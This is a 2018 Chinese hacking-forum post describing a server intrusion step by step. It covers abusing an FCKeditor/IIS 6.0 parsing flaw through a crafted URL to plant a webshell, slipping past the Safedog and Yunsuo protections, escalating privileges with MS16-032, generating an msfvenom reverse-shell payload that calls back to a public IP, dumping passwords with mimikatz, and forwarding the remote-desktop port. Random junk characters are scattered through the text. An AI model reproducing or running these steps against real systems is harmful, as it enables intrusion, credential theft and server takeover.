找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2169|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

\" s6 s, f( G5 i! J. q) G N

' d9 _$ L4 e! b0 _) I4 _1 R: O/ R# `0 F+ @' W: R; \" j& M4 H w: Y5 E% W' Z8 [- s$ u- @8 j3 w5 I S, j& a/ b0 j) s0 P: V& e, ]; R/ i+ S) b4 u
6 R6 o; Q8 b6 L) }# I0 m

( _3 _6 L" H2 j+ a* x6 h# V
$ N0 r# t! G; @* m' h
一、 利用getwebshell
3 [5 a7 w. i7 U. K& l
3 }% @' E0 R, s) M/ O0 g
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
) D3 x" G3 D0 w" ^. W6 l/ N- W$ [
* g A+ ~) l3 D# ^: U222.png
) F/ U. w3 y8 r1 {% Q9 v( d
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
+ ?8 N1 i( v t5 q333.png
8 h9 {- V6 s8 ~- _$ ]
下面我们构造一个asp目录,如: k" U0 e1 V3 {/ i

! H% u. V, a. A

. U) K! D% l4 L+ F' {4 W7 l http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 : e5 G8 @% o2 `6 d9 C

" Q A3 G: L' d& j k% U

% f! [. u1 X# H- g- U; y# Y: X, ^ 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
3 |! Q' K1 E" j7 L8 r1 ?0 ~3 ]. y( P
( L, Z0 t+ N, a
一、 绕过安全狗云锁提权并且加账号
1 D5 k! R3 _8 O& {; e7 L444.png
: Q+ p% i' `; n8 J% E: q+ `4 I
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
8 T4 w1 U5 b: j0 s0 x' i
6 j- x# b8 [, R. U; [5 T
如图:
r) n' F# {: F% @. `3 H& b555.png
, G, L$ B4 x6 U U
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
% z6 b9 m" _6 y# k. C5 l+ @& n
5 w% ?2 O- E# T3 L% w
一、 利用metasploit
' i) p! g2 A5 t) t, f& ]8 @. x
; D. j$ c, ]% e( Y
首先用pentestbox生成一个64位的payload如下命令
2 c% ^+ H% g/ L
& q+ t9 L2 z g( d1 t2 B8 E3 Y9 n: amsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
: G! F( N$ D7 J0 ?0 A* K
8 r+ e6 |% M3 Y7 i1 {
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
* [0 x3 l$ ~3 A. [) ]; O r11.png
/ g$ W I+ Y7 n" U1 O: F
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
1 r, q" C' Q8 p& f+ W* s6 l; ~13.png
! v; C1 S. N2 n" l1 D H* c6 r# o* }" C
下面我们来做一个监听如下命令:
( d; w6 B, \1 X4 g S" e
( i( Q0 F& P9 l' \1 ^portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
6 ~7 q0 j9 v5 {. B4 E8 |+ n18.png
0 e& R9 ]8 j& X3 T1 q$ {* S

9 c- ]2 l' t v7 Y R5 M, i$ O
* O: [ T9 }& r5 p

- M# P, o% D9 u8 E2 c: F9 f% f3 f3 @

. t* ?( `! l' P9 f) d0 ]
/ G1 w+ |0 I+ A( w
6 U7 W+ Y5 _2 o" D7 f4 n
" C" E% g* }3 E! C( v+ A

0 o. F! \$ M0 v1 Z
$ n% _! D/ g+ i+ G/ C% J. m % d) W( f1 m( u0 @/ i

( X$ c3 K6 P( L- k4 t2 a
$ s& y, v! I" }- y

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表